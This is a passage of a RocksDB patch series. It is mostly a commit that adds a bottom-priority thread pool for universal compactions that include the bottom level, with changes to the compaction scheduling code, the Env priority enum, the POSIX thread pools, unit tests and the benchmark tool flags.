workers[i].join(); } + data.insert(data_set[i].begin(), data_set[i].end()); } + VerifyDB(data); } // Test sequence number store in blob file is correct. From cc01985db09b3f8ebb2ba971aa505abd77fa6345 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Thu, 3 Aug 2017 15:36:28 -0700 Subject: [PATCH 073/205] Introduce bottom-pri thread pool for large universal compactions Summary: When we had a single thread pool for compactions, a thread could be busy for a long time (minutes) executing a compaction involving the bottom level. In multi-instance setups, the entire thread pool could be consumed by such bottom-level compactions. Then, top-level compactions (e.g., a few L0 files) would be blocked for a long time ("head-of-line blocking"). Such top-level compactions are critical to prevent compaction stalls as they can quickly reduce number of L0 files / sorted runs. This diff introduces a bottom-priority queue for universal compactions including the bottom level. This alleviates the head-of-line blocking situation for fast, top-level compactions. - Added `Env::Priority::BOTTOM` thread pool. This feature is only enabled if user explicitly configures it to have a positive number of threads. - Changed `ThreadPoolImpl`'s default thread limit from one to zero. This change is invisible to users as we call `IncBackgroundThreadsIfNeeded` on the low-pri/high-pri pools during `DB::Open` with values of at least one. It is necessary, though, for bottom-pri to start with zero threads so the feature is disabled by default. - Separated `ManualCompaction` into two parts in `PrepickedCompaction`. `PrepickedCompaction` is used for any compaction that's picked outside of its execution thread, either manual or automatic. - Forward universal compactions involving last level to the bottom pool (worker thread's entry point is `BGWorkBottomCompaction`). - Track `bg_bottom_compaction_scheduled_` so we can wait for bottom-level compactions to finish. We don't count them against the background jobs limits. So users of this feature will get an extra compaction for free. Closes https://github.com/facebook/rocksdb/pull/2580 Differential Revision: D5422916 Pulled By: ajkr fbshipit-source-id: a74bd11f1ea4933df3739b16808bb21fcd512333 --- HISTORY.md | 1 + db/db_impl.cc | 11 ++- db/db_impl.h | 36 ++++++-- db/db_impl_compaction_flush.cc | 143 ++++++++++++++++++++--------- db/db_impl_debug.cc | 4 +- db/db_universal_compaction_test.cc | 97 +++++++++++++++++++ db/version_set.cc | 8 ++ db/version_set.h | 1 + env/env_posix.cc | 12 +-- env/env_test.cc | 14 +-- include/rocksdb/env.h | 2 +- memtable/inlineskiplist_test.cc | 1 + memtable/skiplist_test.cc | 1 + tools/db_bench_tool.cc | 6 ++ util/threadpool_imp.cc | 6 +- 15 files changed, 273 insertions(+), 70 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 53ff4b9cf0b..7c71fdd1687 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -3,6 +3,7 @@ ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. +* Universal compactions including the bottom level can be executed in a dedicated thread pool. This alleviates head-of-line blocking in the compaction queue, which cause write stalling, particularly in multi-instance use cases. Users can enable this feature via `Env::SetBackgroundThreads(N, Env::Priority::BOTTOM)`, where `N > 0`. ### Bug Fixes * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. diff --git a/db/db_impl.cc b/db/db_impl.cc index bfe38302fc6..86bb4a43381 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -168,6 +168,7 @@ DBImpl::DBImpl(const DBOptions& options, const std::string& dbname) last_batch_group_size_(0), unscheduled_flushes_(0), unscheduled_compactions_(0), + bg_bottom_compaction_scheduled_(0), bg_compaction_scheduled_(0), num_running_compactions_(0), bg_flush_scheduled_(0), @@ -242,7 +243,8 @@ void DBImpl::CancelAllBackgroundWork(bool wait) { return; } // Wait for background work to finish - while (bg_compaction_scheduled_ || bg_flush_scheduled_) { + while (bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ || + bg_flush_scheduled_) { bg_cv_.Wait(); } } @@ -252,15 +254,18 @@ DBImpl::~DBImpl() { // marker. After this we do a variant of the waiting and unschedule work // (to consider: moving all the waiting into CancelAllBackgroundWork(true)) CancelAllBackgroundWork(false); + int bottom_compactions_unscheduled = + env_->UnSchedule(this, Env::Priority::BOTTOM); int compactions_unscheduled = env_->UnSchedule(this, Env::Priority::LOW); int flushes_unscheduled = env_->UnSchedule(this, Env::Priority::HIGH); mutex_.Lock(); + bg_bottom_compaction_scheduled_ -= bottom_compactions_unscheduled; bg_compaction_scheduled_ -= compactions_unscheduled; bg_flush_scheduled_ -= flushes_unscheduled; // Wait for background work to finish - while (bg_compaction_scheduled_ || bg_flush_scheduled_ || - bg_purge_scheduled_) { + while (bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ || + bg_flush_scheduled_ || bg_purge_scheduled_) { TEST_SYNC_POINT("DBImpl::~DBImpl:WaitJob"); bg_cv_.Wait(); } diff --git a/db/db_impl.h b/db/db_impl.h index 3284048a688..d89ea50cad8 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -658,6 +658,7 @@ class DBImpl : public DB { } }; + struct PrepickedCompaction; struct PurgeFileInfo; // Recover the descriptor from persistent storage. May do a significant @@ -799,14 +800,19 @@ class DBImpl : public DB { void SchedulePendingPurge(std::string fname, FileType type, uint64_t number, uint32_t path_id, int job_id); static void BGWorkCompaction(void* arg); + // Runs a pre-chosen universal compaction involving bottom level in a + // separate, bottom-pri thread pool. + static void BGWorkBottomCompaction(void* arg); static void BGWorkFlush(void* db); static void BGWorkPurge(void* arg); static void UnscheduleCallback(void* arg); - void BackgroundCallCompaction(void* arg); + void BackgroundCallCompaction(PrepickedCompaction* prepicked_compaction, + Env::Priority bg_thread_pri); void BackgroundCallFlush(); void BackgroundCallPurge(); Status BackgroundCompaction(bool* madeProgress, JobContext* job_context, - LogBuffer* log_buffer, void* m = 0); + LogBuffer* log_buffer, + PrepickedCompaction* prepicked_compaction); Status BackgroundFlush(bool* madeProgress, JobContext* job_context, LogBuffer* log_buffer); @@ -1059,6 +1065,10 @@ class DBImpl : public DB { int unscheduled_flushes_; int unscheduled_compactions_; + // count how many background compactions are running or have been scheduled in + // the BOTTOM pool + int bg_bottom_compaction_scheduled_; + // count how many background compactions are running or have been scheduled int bg_compaction_scheduled_; @@ -1075,7 +1085,7 @@ class DBImpl : public DB { int bg_purge_scheduled_; // Information for a manual compaction - struct ManualCompaction { + struct ManualCompactionState { ColumnFamilyData* cfd; int input_level; int output_level; @@ -1091,13 +1101,21 @@ class DBImpl : public DB { InternalKey* manual_end; // how far we are compacting InternalKey tmp_storage; // Used to keep track of compaction progress InternalKey tmp_storage1; // Used to keep track of compaction progress + }; + struct PrepickedCompaction { + // background compaction takes ownership of `compaction`. Compaction* compaction; + // caller retains ownership of `manual_compaction_state` as it is reused + // across background compactions. + ManualCompactionState* manual_compaction_state; // nullptr if non-manual }; - std::deque manual_compaction_dequeue_; + std::deque manual_compaction_dequeue_; struct CompactionArg { + // caller retains ownership of `db`. DBImpl* db; - ManualCompaction* m; + // background compaction takes ownership of `prepicked_compaction`. + PrepickedCompaction* prepicked_compaction; }; // Have we encountered a background error in paranoid mode? @@ -1231,11 +1249,11 @@ class DBImpl : public DB { bool HasPendingManualCompaction(); bool HasExclusiveManualCompaction(); - void AddManualCompaction(ManualCompaction* m); - void RemoveManualCompaction(ManualCompaction* m); - bool ShouldntRunManualCompaction(ManualCompaction* m); + void AddManualCompaction(ManualCompactionState* m); + void RemoveManualCompaction(ManualCompactionState* m); + bool ShouldntRunManualCompaction(ManualCompactionState* m); bool HaveManualCompaction(ColumnFamilyData* cfd); - bool MCOverlap(ManualCompaction* m, ManualCompaction* m1); + bool MCOverlap(ManualCompactionState* m, ManualCompactionState* m1); size_t GetWalPreallocateBlockSize(uint64_t write_buffer_size) const; diff --git a/db/db_impl_compaction_flush.cc b/db/db_impl_compaction_flush.cc index 68d2831233b..3e686fe7039 100644 --- a/db/db_impl_compaction_flush.cc +++ b/db/db_impl_compaction_flush.cc @@ -612,7 +612,8 @@ Status DBImpl::CompactFilesImpl( Status DBImpl::PauseBackgroundWork() { InstrumentedMutexLock guard_lock(&mutex_); bg_compaction_paused_++; - while (bg_compaction_scheduled_ > 0 || bg_flush_scheduled_ > 0) { + while (bg_bottom_compaction_scheduled_ > 0 || bg_compaction_scheduled_ > 0 || + bg_flush_scheduled_ > 0) { bg_cv_.Wait(); } bg_work_paused_++; @@ -808,7 +809,7 @@ Status DBImpl::RunManualCompaction(ColumnFamilyData* cfd, int input_level, bool scheduled = false; bool manual_conflict = false; - ManualCompaction manual; + ManualCompactionState manual; manual.cfd = cfd; manual.input_level = input_level; manual.output_level = output_level; @@ -858,7 +859,8 @@ Status DBImpl::RunManualCompaction(ColumnFamilyData* cfd, int input_level, AddManualCompaction(&manual); TEST_SYNC_POINT_CALLBACK("DBImpl::RunManualCompaction:NotScheduled", &mutex_); if (exclusive) { - while (bg_compaction_scheduled_ > 0) { + while (bg_bottom_compaction_scheduled_ > 0 || + bg_compaction_scheduled_ > 0) { TEST_SYNC_POINT("DBImpl::RunManualCompaction:WaitScheduled"); ROCKS_LOG_INFO( immutable_db_options_.info_log, @@ -878,14 +880,14 @@ Status DBImpl::RunManualCompaction(ColumnFamilyData* cfd, int input_level, while (!manual.done) { assert(HasPendingManualCompaction()); manual_conflict = false; + Compaction* compaction; if (ShouldntRunManualCompaction(&manual) || (manual.in_progress == true) || scheduled || - ((manual.manual_end = &manual.tmp_storage1)&&( - (manual.compaction = manual.cfd->CompactRange( - *manual.cfd->GetLatestMutableCFOptions(), manual.input_level, - manual.output_level, manual.output_path_id, manual.begin, - manual.end, &manual.manual_end, &manual_conflict)) == - nullptr) && + ((manual.manual_end = &manual.tmp_storage1) && + ((compaction = manual.cfd->CompactRange( + *manual.cfd->GetLatestMutableCFOptions(), manual.input_level, + manual.output_level, manual.output_path_id, manual.begin, + manual.end, &manual.manual_end, &manual_conflict)) == nullptr) && manual_conflict)) { // exclusive manual compactions should not see a conflict during // CompactRange @@ -898,14 +900,16 @@ Status DBImpl::RunManualCompaction(ColumnFamilyData* cfd, int input_level, manual.incomplete = false; } } else if (!scheduled) { - if (manual.compaction == nullptr) { + if (compaction == nullptr) { manual.done = true; bg_cv_.SignalAll(); continue; } ca = new CompactionArg; ca->db = this; - ca->m = &manual; + ca->prepicked_compaction = new PrepickedCompaction; + ca->prepicked_compaction->manual_compaction_state = &manual; + ca->prepicked_compaction->compaction = compaction; manual.incomplete = false; bg_compaction_scheduled_++; env_->Schedule(&DBImpl::BGWorkCompaction, ca, Env::Priority::LOW, this, @@ -1047,7 +1051,7 @@ void DBImpl::MaybeScheduleFlushOrCompaction() { unscheduled_compactions_ > 0) { CompactionArg* ca = new CompactionArg; ca->db = this; - ca->m = nullptr; + ca->prepicked_compaction = nullptr; bg_compaction_scheduled_++; unscheduled_compactions_--; env_->Schedule(&DBImpl::BGWorkCompaction, ca, Env::Priority::LOW, this, @@ -1152,7 +1156,23 @@ void DBImpl::BGWorkCompaction(void* arg) { delete reinterpret_cast(arg); IOSTATS_SET_THREAD_POOL_ID(Env::Priority::LOW); TEST_SYNC_POINT("DBImpl::BGWorkCompaction"); - reinterpret_cast(ca.db)->BackgroundCallCompaction(ca.m); + auto prepicked_compaction = + static_cast(ca.prepicked_compaction); + reinterpret_cast(ca.db)->BackgroundCallCompaction( + prepicked_compaction, Env::Priority::LOW); + delete prepicked_compaction; +} + +void DBImpl::BGWorkBottomCompaction(void* arg) { + CompactionArg ca = *(static_cast(arg)); + delete static_cast(arg); + IOSTATS_SET_THREAD_POOL_ID(Env::Priority::BOTTOM); + TEST_SYNC_POINT("DBImpl::BGWorkBottomCompaction"); + auto* prepicked_compaction = ca.prepicked_compaction; + assert(prepicked_compaction && prepicked_compaction->compaction && + !prepicked_compaction->manual_compaction_state); + ca.db->BackgroundCallCompaction(prepicked_compaction, Env::Priority::BOTTOM); + delete prepicked_compaction; } void DBImpl::BGWorkPurge(void* db) { @@ -1165,8 +1185,11 @@ void DBImpl::BGWorkPurge(void* db) { void DBImpl::UnscheduleCallback(void* arg) { CompactionArg ca = *(reinterpret_cast(arg)); delete reinterpret_cast(arg); - if ((ca.m != nullptr) && (ca.m->compaction != nullptr)) { - delete ca.m->compaction; + if (ca.prepicked_compaction != nullptr) { + if (ca.prepicked_compaction->compaction != nullptr) { + delete ca.prepicked_compaction->compaction; + } + delete ca.prepicked_compaction; } TEST_SYNC_POINT("DBImpl::UnscheduleCallback"); } @@ -1293,9 +1316,9 @@ void DBImpl::BackgroundCallFlush() { } } -void DBImpl::BackgroundCallCompaction(void* arg) { +void DBImpl::BackgroundCallCompaction(PrepickedCompaction* prepicked_compaction, + Env::Priority bg_thread_pri) { bool made_progress = false; - ManualCompaction* m = reinterpret_cast(arg); JobContext job_context(next_job_id_.fetch_add(1), true); TEST_SYNC_POINT("BackgroundCallCompaction:0"); MaybeDumpStats(); @@ -1313,9 +1336,11 @@ void DBImpl::BackgroundCallCompaction(void* arg) { auto pending_outputs_inserted_elem = CaptureCurrentFileNumberInPendingOutputs(); - assert(bg_compaction_scheduled_); - Status s = - BackgroundCompaction(&made_progress, &job_context, &log_buffer, m); + assert((bg_thread_pri == Env::Priority::BOTTOM && + bg_bottom_compaction_scheduled_) || + (bg_thread_pri == Env::Priority::LOW && bg_compaction_scheduled_)); + Status s = BackgroundCompaction(&made_progress, &job_context, &log_buffer, + prepicked_compaction); TEST_SYNC_POINT("BackgroundCallCompaction:1"); if (!s.ok() && !s.IsShutdownInProgress()) { // Wait a little bit before retrying background compaction in @@ -1361,17 +1386,24 @@ void DBImpl::BackgroundCallCompaction(void* arg) { assert(num_running_compactions_ > 0); num_running_compactions_--; - bg_compaction_scheduled_--; + if (bg_thread_pri == Env::Priority::LOW) { + bg_compaction_scheduled_--; + } else { + assert(bg_thread_pri == Env::Priority::BOTTOM); + bg_bottom_compaction_scheduled_--; + } versions_->GetColumnFamilySet()->FreeDeadColumnFamilies(); // See if there's more work to be done MaybeScheduleFlushOrCompaction(); - if (made_progress || bg_compaction_scheduled_ == 0 || + if (made_progress || + (bg_compaction_scheduled_ == 0 && + bg_bottom_compaction_scheduled_ == 0) || HasPendingManualCompaction()) { // signal if // * made_progress -- need to wakeup DelayWrite - // * bg_compaction_scheduled_ == 0 -- need to wakeup ~DBImpl + // * bg_{bottom,}_compaction_scheduled_ == 0 -- need to wakeup ~DBImpl // * HasPendingManualCompaction -- need to wakeup RunManualCompaction // If none of this is true, there is no need to signal since nobody is // waiting for it @@ -1386,14 +1418,23 @@ void DBImpl::BackgroundCallCompaction(void* arg) { Status DBImpl::BackgroundCompaction(bool* made_progress, JobContext* job_context, - LogBuffer* log_buffer, void* arg) { - ManualCompaction* manual_compaction = - reinterpret_cast(arg); + LogBuffer* log_buffer, + PrepickedCompaction* prepicked_compaction) { + ManualCompactionState* manual_compaction = + prepicked_compaction == nullptr + ? nullptr + : prepicked_compaction->manual_compaction_state; *made_progress = false; mutex_.AssertHeld(); TEST_SYNC_POINT("DBImpl::BackgroundCompaction:Start"); bool is_manual = (manual_compaction != nullptr); + unique_ptr c; + if (prepicked_compaction != nullptr && + prepicked_compaction->compaction != nullptr) { + c.reset(prepicked_compaction->compaction); + } + bool is_prepicked = is_manual || c; // (manual_compaction->in_progress == false); bool trivial_move_disallowed = @@ -1410,7 +1451,6 @@ Status DBImpl::BackgroundCompaction(bool* made_progress, manual_compaction->status = status; manual_compaction->done = true; manual_compaction->in_progress = false; - delete manual_compaction->compaction; manual_compaction = nullptr; } return status; @@ -1421,13 +1461,11 @@ Status DBImpl::BackgroundCompaction(bool* made_progress, manual_compaction->in_progress = true; } - unique_ptr c; // InternalKey manual_end_storage; // InternalKey* manual_end = &manual_end_storage; if (is_manual) { - ManualCompaction* m = manual_compaction; + ManualCompactionState* m = manual_compaction; assert(m->in_progress); - c.reset(std::move(m->compaction)); if (!c) { m->done = true; m->manual_end = nullptr; @@ -1449,7 +1487,7 @@ Status DBImpl::BackgroundCompaction(bool* made_progress, ? "(end)" : m->manual_end->DebugString().c_str())); } - } else if (!compaction_queue_.empty()) { + } else if (!is_prepicked && !compaction_queue_.empty()) { if (HaveManualCompaction(compaction_queue_.front())) { // Can't compact right now, but try again later TEST_SYNC_POINT("DBImpl::BackgroundCompaction()::Conflict"); @@ -1601,6 +1639,28 @@ Status DBImpl::BackgroundCompaction(bool* made_progress, // Clear Instrument ThreadStatusUtil::ResetThreadStatus(); + } else if (c->column_family_data()->ioptions()->compaction_style == + kCompactionStyleUniversal && + !is_prepicked && c->output_level() > 0 && + c->output_level() == + c->column_family_data() + ->current() + ->storage_info() + ->MaxOutputLevel( + immutable_db_options_.allow_ingest_behind) && + env_->GetBackgroundThreads(Env::Priority::BOTTOM) > 0) { + // Forward universal compactions involving last level to the bottom pool + // if it exists, such that long-running compactions can't block short- + // lived ones, like L0->L0s. + TEST_SYNC_POINT("DBImpl::BackgroundCompaction:ForwardToBottomPriPool"); + CompactionArg* ca = new CompactionArg; + ca->db = this; + ca->prepicked_compaction = new PrepickedCompaction; + ca->prepicked_compaction->compaction = c.release(); + ca->prepicked_compaction->manual_compaction_state = nullptr; + ++bg_bottom_compaction_scheduled_; + env_->Schedule(&DBImpl::BGWorkBottomCompaction, ca, Env::Priority::BOTTOM, + this, &DBImpl::UnscheduleCallback); } else { int output_level __attribute__((unused)) = c->output_level(); TEST_SYNC_POINT_CALLBACK("DBImpl::BackgroundCompaction:NonTrivial", @@ -1664,7 +1724,7 @@ Status DBImpl::BackgroundCompaction(bool* made_progress, } if (is_manual) { - ManualCompaction* m = manual_compaction; + ManualCompactionState* m = manual_compaction; if (!status.ok()) { m->status = status; m->done = true; @@ -1707,13 +1767,13 @@ bool DBImpl::HasPendingManualCompaction() { return (!manual_compaction_dequeue_.empty()); } -void DBImpl::AddManualCompaction(DBImpl::ManualCompaction* m) { +void DBImpl::AddManualCompaction(DBImpl::ManualCompactionState* m) { manual_compaction_dequeue_.push_back(m); } -void DBImpl::RemoveManualCompaction(DBImpl::ManualCompaction* m) { +void DBImpl::RemoveManualCompaction(DBImpl::ManualCompactionState* m) { // Remove from queue - std::deque::iterator it = + std::deque::iterator it = manual_compaction_dequeue_.begin(); while (it != manual_compaction_dequeue_.end()) { if (m == (*it)) { @@ -1726,16 +1786,17 @@ void DBImpl::RemoveManualCompaction(DBImpl::ManualCompaction* m) { return; } -bool DBImpl::ShouldntRunManualCompaction(ManualCompaction* m) { +bool DBImpl::ShouldntRunManualCompaction(ManualCompactionState* m) { if (num_running_ingest_file_ > 0) { // We need to wait for other IngestExternalFile() calls to finish // before running a manual compaction. return true; } if (m->exclusive) { - return (bg_compaction_scheduled_ > 0); + return (bg_bottom_compaction_scheduled_ > 0 || + bg_compaction_scheduled_ > 0); } - std::deque::iterator it = + std::deque::iterator it = manual_compaction_dequeue_.begin(); bool seen = false; while (it != manual_compaction_dequeue_.end()) { @@ -1756,7 +1817,7 @@ bool DBImpl::ShouldntRunManualCompaction(ManualCompaction* m) { bool DBImpl::HaveManualCompaction(ColumnFamilyData* cfd) { // Remove from priority queue - std::deque::iterator it = + std::deque::iterator it = manual_compaction_dequeue_.begin(); while (it != manual_compaction_dequeue_.end()) { if ((*it)->exclusive) { @@ -1774,7 +1835,7 @@ bool DBImpl::HaveManualCompaction(ColumnFamilyData* cfd) { bool DBImpl::HasExclusiveManualCompaction() { // Remove from priority queue - std::deque::iterator it = + std::deque::iterator it = manual_compaction_dequeue_.begin(); while (it != manual_compaction_dequeue_.end()) { if ((*it)->exclusive) { @@ -1785,7 +1846,7 @@ bool DBImpl::HasExclusiveManualCompaction() { return false; } -bool DBImpl::MCOverlap(ManualCompaction* m, ManualCompaction* m1) { +bool DBImpl::MCOverlap(ManualCompactionState* m, ManualCompactionState* m1) { if ((m->exclusive) || (m1->exclusive)) { return true; } diff --git a/db/db_impl_debug.cc b/db/db_impl_debug.cc index 9f4fccabc42..de5b66f2a6c 100644 --- a/db/db_impl_debug.cc +++ b/db/db_impl_debug.cc @@ -112,7 +112,9 @@ Status DBImpl::TEST_WaitForCompact() { // OR flush to finish. InstrumentedMutexLock l(&mutex_); - while ((bg_compaction_scheduled_ || bg_flush_scheduled_) && bg_error_.ok()) { + while ((bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ || + bg_flush_scheduled_) && + bg_error_.ok()) { bg_cv_.Wait(); } return bg_error_; diff --git a/db/db_universal_compaction_test.cc b/db/db_universal_compaction_test.cc index c6334f8e067..ca7ebac8ecd 100644 --- a/db/db_universal_compaction_test.cc +++ b/db/db_universal_compaction_test.cc @@ -1370,6 +1370,103 @@ TEST_P(DBTestUniversalCompaction, UniversalCompactionSecondPathRatio) { Destroy(options); } +TEST_P(DBTestUniversalCompaction, FullCompactionInBottomPriThreadPool) { + const int kNumFilesTrigger = 3; + Env::Default()->SetBackgroundThreads(1, Env::Priority::BOTTOM); + for (bool allow_ingest_behind : {false, true}) { + Options options = CurrentOptions(); + options.allow_ingest_behind = allow_ingest_behind; + options.compaction_style = kCompactionStyleUniversal; + options.num_levels = num_levels_; + options.write_buffer_size = 100 << 10; // 100KB + options.target_file_size_base = 32 << 10; // 32KB + options.level0_file_num_compaction_trigger = kNumFilesTrigger; + // Trigger compaction if size amplification exceeds 110% + options.compaction_options_universal.max_size_amplification_percent = 110; + DestroyAndReopen(options); + + int num_bottom_pri_compactions = 0; + SyncPoint::GetInstance()->SetCallBack( + "DBImpl::BGWorkBottomCompaction", + [&](void* arg) { ++num_bottom_pri_compactions; }); + SyncPoint::GetInstance()->EnableProcessing(); + + Random rnd(301); + for (int num = 0; num < kNumFilesTrigger; num++) { + ASSERT_EQ(NumSortedRuns(), num); + int key_idx = 0; + GenerateNewFile(&rnd, &key_idx); + } + dbfull()->TEST_WaitForCompact(); + + if (allow_ingest_behind || num_levels_ > 1) { + // allow_ingest_behind increases number of levels while sanitizing. + ASSERT_EQ(1, num_bottom_pri_compactions); + } else { + // for single-level universal, everything's bottom level so nothing should + // be executed in bottom-pri thread pool. + ASSERT_EQ(0, num_bottom_pri_compactions); + } + // Verify that size amplification did occur + ASSERT_EQ(NumSortedRuns(), 1); + rocksdb::SyncPoint::GetInstance()->DisableProcessing(); + } +} + +TEST_P(DBTestUniversalCompaction, ConcurrentBottomPriLowPriCompactions) { + if (num_levels_ == 1) { + // for single-level universal, everything's bottom level so nothing should + // be executed in bottom-pri thread pool. + return; + } + const int kNumFilesTrigger = 3; + Env::Default()->SetBackgroundThreads(1, Env::Priority::BOTTOM); + Options options = CurrentOptions(); + options.compaction_style = kCompactionStyleUniversal; + options.num_levels = num_levels_; + options.write_buffer_size = 100 << 10; // 100KB + options.target_file_size_base = 32 << 10; // 32KB + options.level0_file_num_compaction_trigger = kNumFilesTrigger; + // Trigger compaction if size amplification exceeds 110% + options.compaction_options_universal.max_size_amplification_percent = 110; + DestroyAndReopen(options); + + rocksdb::SyncPoint::GetInstance()->LoadDependency( + {// wait for the full compaction to be picked before adding files intended + // for the second one. + {"DBImpl::BackgroundCompaction:ForwardToBottomPriPool", + "DBTestUniversalCompaction:ConcurrentBottomPriLowPriCompactions:0"}, + // the full (bottom-pri) compaction waits until a partial (low-pri) + // compaction has started to verify they can run in parallel. + {"DBImpl::BackgroundCompaction:NonTrivial", + "DBImpl::BGWorkBottomCompaction"}}); + SyncPoint::GetInstance()->EnableProcessing(); + + Random rnd(301); + for (int i = 0; i < 2; ++i) { + for (int num = 0; num < kNumFilesTrigger; num++) { + int key_idx = 0; + GenerateNewFile(&rnd, &key_idx, true /* no_wait */); + // use no_wait above because that one waits for flush and compaction. We + // don't want to wait for compaction because the full compaction is + // intentionally blocked while more files are flushed. + dbfull()->TEST_WaitForFlushMemTable(); + } + if (i == 0) { + TEST_SYNC_POINT( + "DBTestUniversalCompaction:ConcurrentBottomPriLowPriCompactions:0"); + } + } + dbfull()->TEST_WaitForCompact(); + + // First compaction should output to bottom level. Second should output to L0 + // since older L0 files pending compaction prevent it from being placed lower. + ASSERT_EQ(NumSortedRuns(), 2); + ASSERT_GT(NumTableFilesAtLevel(0), 0); + ASSERT_GT(NumTableFilesAtLevel(num_levels_ - 1), 0); + rocksdb::SyncPoint::GetInstance()->DisableProcessing(); +} + INSTANTIATE_TEST_CASE_P(UniversalCompactionNumLevels, DBTestUniversalCompaction, ::testing::Combine(::testing::Values(1, 3, 5), ::testing::Bool())); diff --git a/db/version_set.cc b/db/version_set.cc index f8465027bb5..6b9611aa9bd 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -1227,6 +1227,14 @@ int VersionStorageInfo::MaxInputLevel() const { return 0; } +int VersionStorageInfo::MaxOutputLevel(bool allow_ingest_behind) const { + if (allow_ingest_behind) { + assert(num_levels() > 1); + return num_levels() - 2; + } + return num_levels() - 1; +} + void VersionStorageInfo::EstimateCompactionBytesNeeded( const MutableCFOptions& mutable_cf_options) { // Only implemented for level-based compaction diff --git a/db/version_set.h b/db/version_set.h index 5a1f8d07d64..9fb000c058b 100644 --- a/db/version_set.h +++ b/db/version_set.h @@ -147,6 +147,7 @@ class VersionStorageInfo { } int MaxInputLevel() const; + int MaxOutputLevel(bool allow_ingest_behind) const; // Return level number that has idx'th highest score int CompactionScoreLevel(int idx) const { return compaction_level_[idx]; } diff --git a/env/env_posix.cc b/env/env_posix.cc index 7f2bc3b85dd..5a671d72fe4 100644 --- a/env/env_posix.cc +++ b/env/env_posix.cc @@ -761,23 +761,23 @@ class PosixEnv : public Env { // Allow increasing the number of worker threads. virtual void SetBackgroundThreads(int num, Priority pri) override { - assert(pri >= Priority::LOW && pri <= Priority::HIGH); + assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH); thread_pools_[pri].SetBackgroundThreads(num); } virtual int GetBackgroundThreads(Priority pri) override { - assert(pri >= Priority::LOW && pri <= Priority::HIGH); + assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH); return thread_pools_[pri].GetBackgroundThreads(); } // Allow increasing the number of worker threads. virtual void IncBackgroundThreadsIfNeeded(int num, Priority pri) override { - assert(pri >= Priority::LOW && pri <= Priority::HIGH); + assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH); thread_pools_[pri].IncBackgroundThreadsIfNeeded(num); } virtual void LowerThreadPoolIOPriority(Priority pool = LOW) override { - assert(pool >= Priority::LOW && pool <= Priority::HIGH); + assert(pool >= Priority::BOTTOM && pool <= Priority::HIGH); #ifdef OS_LINUX thread_pools_[pool].LowerIOPriority(); #endif @@ -883,7 +883,7 @@ PosixEnv::PosixEnv() void PosixEnv::Schedule(void (*function)(void* arg1), void* arg, Priority pri, void* tag, void (*unschedFunction)(void* arg)) { - assert(pri >= Priority::LOW && pri <= Priority::HIGH); + assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH); thread_pools_[pri].Schedule(function, arg, tag, unschedFunction); } @@ -892,7 +892,7 @@ int PosixEnv::UnSchedule(void* arg, Priority pri) { } unsigned int PosixEnv::GetThreadPoolQueueLen(Priority pri) const { - assert(pri >= Priority::LOW && pri <= Priority::HIGH); + assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH); return thread_pools_[pri].GetQueueLen(); } diff --git a/env/env_test.cc b/env/env_test.cc index 7fd71a3c430..9ec2f142ed8 100644 --- a/env/env_test.cc +++ b/env/env_test.cc @@ -125,12 +125,14 @@ static void SetBool(void* ptr) { reinterpret_cast*>(ptr)->store(true); } -TEST_P(EnvPosixTestWithParam, RunImmediately) { - std::atomic called(false); - env_->Schedule(&SetBool, &called); - Env::Default()->SleepForMicroseconds(kDelayMicros); - ASSERT_TRUE(called.load()); - WaitThreadPoolsEmpty(); +TEST_F(EnvPosixTest, RunImmediately) { + for (int pri = Env::BOTTOM; pri < Env::TOTAL; ++pri) { + std::atomic called(false); + env_->SetBackgroundThreads(1, static_cast(pri)); + env_->Schedule(&SetBool, &called, static_cast(pri)); + Env::Default()->SleepForMicroseconds(kDelayMicros); + ASSERT_TRUE(called.load()); + } } TEST_P(EnvPosixTestWithParam, UnSchedule) { diff --git a/include/rocksdb/env.h b/include/rocksdb/env.h index 8690738998f..e2efbdc15fd 100644 --- a/include/rocksdb/env.h +++ b/include/rocksdb/env.h @@ -283,7 +283,7 @@ class Env { virtual Status UnlockFile(FileLock* lock) = 0; // Priority for scheduling job in thread pool - enum Priority { LOW, HIGH, TOTAL }; + enum Priority { BOTTOM, LOW, HIGH, TOTAL }; // Priority for requesting bytes in rate limiter scheduler enum IOPriority { diff --git a/memtable/inlineskiplist_test.cc b/memtable/inlineskiplist_test.cc index 46d6c0fa988..5803e5b0f55 100644 --- a/memtable/inlineskiplist_test.cc +++ b/memtable/inlineskiplist_test.cc @@ -571,6 +571,7 @@ static void RunConcurrentRead(int run) { fprintf(stderr, "Run %d of %d\n", i, N); } TestState state(seed + 1); + Env::Default()->SetBackgroundThreads(1); Env::Default()->Schedule(ConcurrentReader, &state); state.Wait(TestState::RUNNING); for (int k = 0; k < kSize; ++k) { diff --git a/memtable/skiplist_test.cc b/memtable/skiplist_test.cc index 2f4af17885e..50c3588bb86 100644 --- a/memtable/skiplist_test.cc +++ b/memtable/skiplist_test.cc @@ -363,6 +363,7 @@ static void RunConcurrent(int run) { fprintf(stderr, "Run %d of %d\n", i, N); } TestState state(seed + 1); + Env::Default()->SetBackgroundThreads(1); Env::Default()->Schedule(ConcurrentReader, &state); state.Wait(TestState::RUNNING); for (int k = 0; k < kSize; k++) { diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index f0221625947..6dfff771fc5 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -318,6 +318,10 @@ DEFINE_int32(max_background_jobs, "The maximum number of concurrent background jobs that can occur " "in parallel."); +DEFINE_int32(num_bottom_pri_threads, 0, + "The number of threads in the bottom-priority thread pool (used " + "by universal compaction only)."); + 